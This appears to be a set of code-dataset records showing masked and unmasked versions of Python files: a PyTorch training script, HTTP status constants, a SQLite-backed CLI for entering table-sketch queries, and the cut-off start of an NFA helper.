report = model.training_step(batch, batch_nb)
losses.update(report['loss'])
for k, v in report.items():
writer.add_scalar(f'{k}/train', v, global_step)
b_time = time.time() - end
batch_time.update(b_time)
writer.add_scalar('time/batch/train', b_time, global_step)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,
end='\r'))
<mask token>
def main(cfg, pool=None):
model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool
)
if getattr(cfg, 'load_model', False):
model.load_ckpt()
if model.device != 'cpu' and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
model = model.to(model.device)
train_loader = model.get_train_loader()
test_loader = model.get_test_loader()
for epoch in range(cfg.num_epoch):
time_print(f'\nEpoch {epoch} Training')
train(cfg, epoch, train_loader, model)
filename = 'checkpoint.pth.tar'
if not getattr(cfg.log, 'overwrite_ckpt', True):
filename = '_'.join([str(epoch), filename])
save_checkpoint(state={'epoch': epoch, 'global_step': model.
global_step, 'state_dict': model.state_dict(), 'opt_state_dict':
{k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':
cfg}, directory=cfg.log.misc_dir, filename=filename)
time_print('\nTest')
test(cfg, test_loader, model)
<mask token>
| <mask token>
def train(cfg, epoch, data_loader, model):
data_time = AverageMeter('Data', ':6.3f')
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,
losses], prefix=f'Epoch: [{epoch}]\t')
model.train()
end = time.time()
for batch_nb, batch in enumerate(data_loader):
d_time = time.time() - end
data_time.update(d_time)
global_step = model.global_step
writer.add_scalar('time/data/train', d_time, global_step)
report = model.training_step(batch, batch_nb)
losses.update(report['loss'])
for k, v in report.items():
writer.add_scalar(f'{k}/train', v, global_step)
b_time = time.time() - end
batch_time.update(b_time)
writer.add_scalar('time/batch/train', b_time, global_step)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,
end='\r'))
def test(cfg, data_loader, model):
data_time = AverageMeter('Data', ':6.3f')
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
metrics = ['performance']
metrics = {m: AverageMeter(m, ':.4e') for m in metrics}
progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,
losses, *metrics.values()], prefix='Test:\t')
model.eval()
global_step = model.global_step
end = time.time()
for batch_nb, batch in enumerate(data_loader):
data_time.update(time.time() - end)
with torch.no_grad():
report = model.test_step(batch, batch_nb)
losses.update(report['loss'])
for k, v in report.items():
if k not in metrics:
metrics[k] = AverageMeter(k, ':.3f')
metrics[k].update(v)
batch_time.update(time.time() - end)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,
end='\r'))
writer.add_scalar('loss/test', losses.avg, global_step)
writer.add_scalar('time/batch/test', batch_time.avg, global_step)
writer.add_scalar('time/data/test', data_time.avg, global_step)
for k, v in metrics.items():
writer.add_scalar(f'{k}/test', v.avg, global_step)
progress.display(len(data_loader) - 1, time_print)
def main(cfg, pool=None):
model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool
)
if getattr(cfg, 'load_model', False):
model.load_ckpt()
if model.device != 'cpu' and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
model = model.to(model.device)
train_loader = model.get_train_loader()
test_loader = model.get_test_loader()
for epoch in range(cfg.num_epoch):
time_print(f'\nEpoch {epoch} Training')
train(cfg, epoch, train_loader, model)
filename = 'checkpoint.pth.tar'
if not getattr(cfg.log, 'overwrite_ckpt', True):
filename = '_'.join([str(epoch), filename])
save_checkpoint(state={'epoch': epoch, 'global_step': model.
global_step, 'state_dict': model.state_dict(), 'opt_state_dict':
{k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':
cfg}, directory=cfg.log.misc_dir, filename=filename)
time_print('\nTest')
test(cfg, test_loader, model)
<mask token>
| <mask token>
def train(cfg, epoch, data_loader, model):
data_time = AverageMeter('Data', ':6.3f')
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,
losses], prefix=f'Epoch: [{epoch}]\t')
model.train()
end = time.time()
for batch_nb, batch in enumerate(data_loader):
d_time = time.time() - end
data_time.update(d_time)
global_step = model.global_step
writer.add_scalar('time/data/train', d_time, global_step)
report = model.training_step(batch, batch_nb)
losses.update(report['loss'])
for k, v in report.items():
writer.add_scalar(f'{k}/train', v, global_step)
b_time = time.time() - end
batch_time.update(b_time)
writer.add_scalar('time/batch/train', b_time, global_step)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,
end='\r'))
def test(cfg, data_loader, model):
data_time = AverageMeter('Data', ':6.3f')
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
metrics = ['performance']
metrics = {m: AverageMeter(m, ':.4e') for m in metrics}
progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,
losses, *metrics.values()], prefix='Test:\t')
model.eval()
global_step = model.global_step
end = time.time()
for batch_nb, batch in enumerate(data_loader):
data_time.update(time.time() - end)
with torch.no_grad():
report = model.test_step(batch, batch_nb)
losses.update(report['loss'])
for k, v in report.items():
if k not in metrics:
metrics[k] = AverageMeter(k, ':.3f')
metrics[k].update(v)
batch_time.update(time.time() - end)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,
end='\r'))
writer.add_scalar('loss/test', losses.avg, global_step)
writer.add_scalar('time/batch/test', batch_time.avg, global_step)
writer.add_scalar('time/data/test', data_time.avg, global_step)
for k, v in metrics.items():
writer.add_scalar(f'{k}/test', v.avg, global_step)
progress.display(len(data_loader) - 1, time_print)
def main(cfg, pool=None):
model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool
)
if getattr(cfg, 'load_model', False):
model.load_ckpt()
if model.device != 'cpu' and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
model = model.to(model.device)
train_loader = model.get_train_loader()
test_loader = model.get_test_loader()
for epoch in range(cfg.num_epoch):
time_print(f'\nEpoch {epoch} Training')
train(cfg, epoch, train_loader, model)
filename = 'checkpoint.pth.tar'
if not getattr(cfg.log, 'overwrite_ckpt', True):
filename = '_'.join([str(epoch), filename])
save_checkpoint(state={'epoch': epoch, 'global_step': model.
global_step, 'state_dict': model.state_dict(), 'opt_state_dict':
{k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':
cfg}, directory=cfg.log.misc_dir, filename=filename)
time_print('\nTest')
test(cfg, test_loader, model)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Run script')
parser.add_argument('--config', '-c', type=str, required=False, default
='config')
args = parser.parse_args()
git_state = get_git_state()
config = importlib.import_module(f'configs.{args.config}').config
config.log.exp_id = git_state[1][:7] + datetime.datetime.now().strftime(
'%Y-%m-%d_%H:%M:%S')
config.log.misc_dir = config.log.dir / 'misc' / config.log.exp_id
config.log.tb_dir = config.log.dir / 'tb' / config.log.exp_id
config.log.misc_dir.mkdir(exist_ok=True, parents=True)
config.log.tb_dir.mkdir(exist_ok=True, parents=True)
torch.manual_seed(config.rnd_seed)
np.random.seed(config.rnd_seed)
random.seed(config.rnd_seed)
if getattr(config, 'anomaly_detection', False):
torch.autograd.set_detect_anomaly(True)
global writer
writer = SummaryWriter(log_dir=config.log.tb_dir, comment=
f'{config.description}, {git_state}')
time_print(pprint.pformat(config))
time_print(f'Git head at state: {git_state}')
try:
if (npp := getattr(config, 'n_process_pool', 0)):
with torch.multiprocessing.Pool(npp) as pool:
main(config, pool=pool)
else:
main(config)
except KeyboardInterrupt:
        time_print('Keyboard interrupt')
exit(0)
| import argparse
import datetime
import importlib
import pprint
import time
import random
import numpy as np
import torch
from torch.utils.tensorboard import SummaryWriter
from utils import get_git_state, time_print, AverageMeter, ProgressMeter, save_checkpoint
def train(cfg, epoch, data_loader, model):
data_time = AverageMeter('Data', ':6.3f')
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,
losses], prefix=f'Epoch: [{epoch}]\t')
model.train()
end = time.time()
for batch_nb, batch in enumerate(data_loader):
d_time = time.time() - end
data_time.update(d_time)
global_step = model.global_step
writer.add_scalar('time/data/train', d_time, global_step)
report = model.training_step(batch, batch_nb)
losses.update(report['loss'])
for k, v in report.items():
writer.add_scalar(f'{k}/train', v, global_step)
b_time = time.time() - end
batch_time.update(b_time)
writer.add_scalar('time/batch/train', b_time, global_step)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,
end='\r'))
def test(cfg, data_loader, model):
data_time = AverageMeter('Data', ':6.3f')
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
metrics = ['performance']
metrics = {m: AverageMeter(m, ':.4e') for m in metrics}
progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,
losses, *metrics.values()], prefix='Test:\t')
model.eval()
global_step = model.global_step
end = time.time()
for batch_nb, batch in enumerate(data_loader):
data_time.update(time.time() - end)
with torch.no_grad():
report = model.test_step(batch, batch_nb)
losses.update(report['loss'])
for k, v in report.items():
if k not in metrics:
metrics[k] = AverageMeter(k, ':.3f')
metrics[k].update(v)
batch_time.update(time.time() - end)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,
end='\r'))
writer.add_scalar('loss/test', losses.avg, global_step)
writer.add_scalar('time/batch/test', batch_time.avg, global_step)
writer.add_scalar('time/data/test', data_time.avg, global_step)
for k, v in metrics.items():
writer.add_scalar(f'{k}/test', v.avg, global_step)
progress.display(len(data_loader) - 1, time_print)
def main(cfg, pool=None):
model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool
)
if getattr(cfg, 'load_model', False):
model.load_ckpt()
if model.device != 'cpu' and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
model = model.to(model.device)
train_loader = model.get_train_loader()
test_loader = model.get_test_loader()
for epoch in range(cfg.num_epoch):
time_print(f'\nEpoch {epoch} Training')
train(cfg, epoch, train_loader, model)
filename = 'checkpoint.pth.tar'
if not getattr(cfg.log, 'overwrite_ckpt', True):
filename = '_'.join([str(epoch), filename])
save_checkpoint(state={'epoch': epoch, 'global_step': model.
global_step, 'state_dict': model.state_dict(), 'opt_state_dict':
{k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':
cfg}, directory=cfg.log.misc_dir, filename=filename)
time_print('\nTest')
test(cfg, test_loader, model)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Run script')
parser.add_argument('--config', '-c', type=str, required=False, default
='config')
args = parser.parse_args()
git_state = get_git_state()
config = importlib.import_module(f'configs.{args.config}').config
config.log.exp_id = git_state[1][:7] + datetime.datetime.now().strftime(
'%Y-%m-%d_%H:%M:%S')
config.log.misc_dir = config.log.dir / 'misc' / config.log.exp_id
config.log.tb_dir = config.log.dir / 'tb' / config.log.exp_id
config.log.misc_dir.mkdir(exist_ok=True, parents=True)
config.log.tb_dir.mkdir(exist_ok=True, parents=True)
torch.manual_seed(config.rnd_seed)
np.random.seed(config.rnd_seed)
random.seed(config.rnd_seed)
if getattr(config, 'anomaly_detection', False):
torch.autograd.set_detect_anomaly(True)
global writer
writer = SummaryWriter(log_dir=config.log.tb_dir, comment=
f'{config.description}, {git_state}')
time_print(pprint.pformat(config))
time_print(f'Git head at state: {git_state}')
try:
if (npp := getattr(config, 'n_process_pool', 0)):
with torch.multiprocessing.Pool(npp) as pool:
main(config, pool=pool)
else:
main(config)
except KeyboardInterrupt:
time_print(f'Keyboard interrupt')
exit(0)
| import argparse
import datetime
import importlib
import pprint
import time
import random
import numpy as np
import torch
from torch.utils.tensorboard import SummaryWriter
from utils import get_git_state, time_print, AverageMeter, ProgressMeter, save_checkpoint
def train(cfg, epoch, data_loader, model):
data_time = AverageMeter("Data", ":6.3f")
batch_time = AverageMeter("Time", ":6.3f")
losses = AverageMeter("Loss", ":.4e")
progress = ProgressMeter(
len(data_loader)-1,
[batch_time, data_time, losses],
prefix=f"Epoch: [{epoch}]\t")
model.train()
end = time.time()
for batch_nb, batch in enumerate(data_loader):
d_time = time.time() - end
data_time.update(d_time)
global_step = model.global_step
writer.add_scalar("time/data/train", d_time, global_step)
report = model.training_step(batch, batch_nb)
losses.update(report["loss"])
for k, v in report.items():
writer.add_scalar(f"{k}/train", v, global_step)
b_time = time.time() - end
batch_time.update(b_time)
writer.add_scalar("time/batch/train", b_time, global_step)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x, end="\r"))
def test(cfg, data_loader, model):
data_time = AverageMeter("Data", ":6.3f")
batch_time = AverageMeter("Time", ":6.3f")
losses = AverageMeter("Loss", ":.4e")
metrics = ["performance"]
metrics = {m: AverageMeter(m, ":.4e") for m in metrics}
progress = ProgressMeter(
len(data_loader)-1,
[batch_time, data_time, losses, *metrics.values()],
prefix="Test:\t")
model.eval()
global_step = model.global_step
end = time.time()
for batch_nb, batch in enumerate(data_loader):
data_time.update(time.time() - end)
with torch.no_grad():
report = model.test_step(batch, batch_nb)
losses.update(report["loss"])
for k, v in report.items():
if k not in metrics:
metrics[k] = AverageMeter(k, ":.3f")
metrics[k].update(v)
batch_time.update(time.time() - end)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x, end="\r"))
writer.add_scalar("loss/test", losses.avg, global_step)
writer.add_scalar("time/batch/test", batch_time.avg, global_step)
writer.add_scalar("time/data/test", data_time.avg, global_step)
for k,v in metrics.items():
writer.add_scalar(f"{k}/test", v.avg, global_step)
progress.display(len(data_loader) - 1, time_print)
def main(cfg, pool=None):
model = importlib.import_module(f"models.{cfg.model}").Model(cfg, pool=pool)
if getattr(cfg, "load_model", False):
model.load_ckpt()
if model.device != "cpu" and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
model = model.to(model.device)
train_loader = model.get_train_loader()
test_loader = model.get_test_loader()
for epoch in range(cfg.num_epoch):
time_print(f"\nEpoch {epoch} Training")
train(cfg, epoch, train_loader, model)
filename = "checkpoint.pth.tar"
if not getattr(cfg.log, "overwrite_ckpt", True):
filename = "_".join([str(epoch), filename])
save_checkpoint(
state={
"epoch": epoch,
"global_step": model.global_step,
"state_dict": model.state_dict(),
"opt_state_dict": {k: v.state_dict() for k,v in model.optimizers.items()},
"cfg": cfg,
},
directory=cfg.log.misc_dir,
filename=filename)
time_print("\nTest")
test(cfg, test_loader, model)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Run script")
parser.add_argument("--config", "-c",type=str, required=False, default="config")
args = parser.parse_args()
git_state = get_git_state()
config = importlib.import_module(f"configs.{args.config}").config
config.log.exp_id = git_state[1][:7] + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S")
config.log.misc_dir = config.log.dir / "misc" / config.log.exp_id
config.log.tb_dir = config.log.dir / "tb" / config.log.exp_id
config.log.misc_dir.mkdir(exist_ok=True, parents=True)
config.log.tb_dir.mkdir(exist_ok=True, parents=True)
torch.manual_seed(config.rnd_seed)
np.random.seed(config.rnd_seed)
random.seed(config.rnd_seed)
if getattr(config, "anomaly_detection", False):
torch.autograd.set_detect_anomaly(True)
global writer
writer = SummaryWriter(
log_dir=config.log.tb_dir,
comment=f"{config.description}, {git_state}")
time_print(pprint.pformat(config))
time_print(f"Git head at state: {git_state}")
try:
if npp:=getattr(config, "n_process_pool", 0):
with torch.multiprocessing.Pool(npp) as pool:
main(config, pool=pool)
else:
main(config)
except KeyboardInterrupt:
time_print(f"Keyboard interrupt")
exit(0) | [
2,
3,
4,
5,
6
] |
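AverageMeter and ProgressMeter are imported from utils but not shown. A minimal sketch of what such meters conventionally look like, with the constructor signatures inferred from the call sites above (an assumption, not the project's actual utils):

class AverageMeter:
    """Tracks the latest value and a running average."""
    def __init__(self, name, fmt=':f'):
        self.name, self.fmt = name, fmt
        self.val = self.sum = self.count = self.avg = 0

    def update(self, val, n=1):
        self.val = val
        self.sum += val * n
        self.count += n
        self.avg = self.sum / self.count

    def __str__(self):
        fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
        return fmtstr.format(name=self.name, val=self.val, avg=self.avg)

class ProgressMeter:
    def __init__(self, num_batches, meters, prefix=''):
        self.num_batches, self.meters, self.prefix = num_batches, meters, prefix

    def display(self, batch, print_fn=print):
        entries = [f'{self.prefix}[{batch}/{self.num_batches}]']
        entries += [str(m) for m in self.meters]
        print_fn('\t'.join(entries))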
92 | d90942f22cbbd9cfc3a431b7857cd909a7690966 | <mask token>
| OK = 200
CREATED = 201
NOT_MODIFIED = 304
UNAUTHORIZED = 401
FORBIDDEN = 403
BAD_REQUEST = 400
NOT_FOUND = 404
CONFLICT = 409
UNPROCESSABLE = 422
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
SERVICE_UNAVAILABLE = 503
ADMIN = 'admin'
ELITE = 'elite'
NOOB = 'noob'
WITHDRAW = 'withdraw'
FUND = 'fund'
| OK = 200
CREATED = 201
NOT_MODIFIED = 304
UNAUTHORIZED = 401
FORBIDDEN = 403
BAD_REQUEST = 400
NOT_FOUND = 404
CONFLICT = 409
UNPROCESSABLE = 422
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
SERVICE_UNAVAILABLE = 503
ADMIN = 'admin'
ELITE = 'elite'
NOOB = 'noob'
WITHDRAW = 'withdraw'
FUND = 'fund'
| null | null | [
0,
1,
2
] |
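The standard library already ships these status codes as http.HTTPStatus, an IntEnum that compares equal to the bare integers and also carries the reason phrase; a sketch of leaning on it instead of hand-rolled constants (the role and transaction constants below it have no stdlib counterpart and would stay as-is):

from http import HTTPStatus

assert HTTPStatus.OK == 200
assert HTTPStatus.UNPROCESSABLE_ENTITY == 422
print(HTTPStatus.NOT_FOUND.phrase)  # -> Not Found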
93 | 54ec1961f4835f575e7129bd0b2fcdeb97be2f03 | <mask token>
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
<mask token>
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
<mask token>
| <mask token>
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
<mask token>
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
<mask token>
| <mask token>
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
def input_order():
ordered = False
while True:
order_input = input('Should results be ordered? (y/n) > ')
if order_input == 'y':
ordered = True
break
elif order_input == 'n':
break
else:
print('y/n only!')
return ordered
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
def main():
config = configparser.ConfigParser()
config.read('config.ini')
db_path = config['db']['path']
conn = sqlite3.connect(db_path)
db_name = input_db_name(conn)
nlq = input_nlq()
num_cols = input_num_cols()
tsq = TableSketchQuery(num_cols)
tsq.types = input_tsq_types(num_cols)
tsq_row_count = input_tsq_row_count()
for i in range(tsq_row_count):
tsq.values.append(input_tsq_row(i + 1, tsq.types))
tsq.order = input_order()
tsq.limit = input_limit()
print(tsq.to_proto())
cur = conn.cursor()
cur.execute(
"""INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)
VALUES (?, ?, ?, ?, ?, ?)"""
, (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().
SerializeToString(), 'waiting', int(time.time())))
conn.commit()
conn.close()
<mask token>
| <mask token>
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
def input_order():
ordered = False
while True:
order_input = input('Should results be ordered? (y/n) > ')
if order_input == 'y':
ordered = True
break
elif order_input == 'n':
break
else:
print('y/n only!')
return ordered
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
def main():
config = configparser.ConfigParser()
config.read('config.ini')
db_path = config['db']['path']
conn = sqlite3.connect(db_path)
db_name = input_db_name(conn)
nlq = input_nlq()
num_cols = input_num_cols()
tsq = TableSketchQuery(num_cols)
tsq.types = input_tsq_types(num_cols)
tsq_row_count = input_tsq_row_count()
for i in range(tsq_row_count):
tsq.values.append(input_tsq_row(i + 1, tsq.types))
tsq.order = input_order()
tsq.limit = input_limit()
print(tsq.to_proto())
cur = conn.cursor()
cur.execute(
"""INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)
VALUES (?, ?, ?, ?, ?, ?)"""
, (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().
SerializeToString(), 'waiting', int(time.time())))
conn.commit()
conn.close()
if __name__ == '__main__':
main()
| import configparser
import sqlite3
import time
import uuid
from duoquest.tsq import TableSketchQuery
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
def input_order():
ordered = False
while True:
order_input = input('Should results be ordered? (y/n) > ')
if order_input == 'y':
ordered = True
break
elif order_input == 'n':
break
else:
print('y/n only!')
return ordered
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
def main():
config = configparser.ConfigParser()
config.read('config.ini')
db_path = config['db']['path']
conn = sqlite3.connect(db_path)
db_name = input_db_name(conn)
nlq = input_nlq()
num_cols = input_num_cols()
tsq = TableSketchQuery(num_cols)
tsq.types = input_tsq_types(num_cols)
tsq_row_count = input_tsq_row_count()
for i in range(tsq_row_count):
tsq.values.append(input_tsq_row(i+1, tsq.types))
tsq.order = input_order()
tsq.limit = input_limit()
print(tsq.to_proto())
cur = conn.cursor()
cur.execute('''INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)
VALUES (?, ?, ?, ?, ?, ?)''',
(str(uuid.uuid4()), db_name, nlq,
tsq.to_proto().SerializeToString(), 'waiting',
int(time.time())))
conn.commit()
conn.close()
if __name__ == '__main__':
main()
| [
5,
7,
9,
10,
12
] |
94 | 2fe20f28fc7bba6b8188f5068e2b3c8b87c15edc | <mask token>
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
<mask token>
class NetworkNFA(NFA):
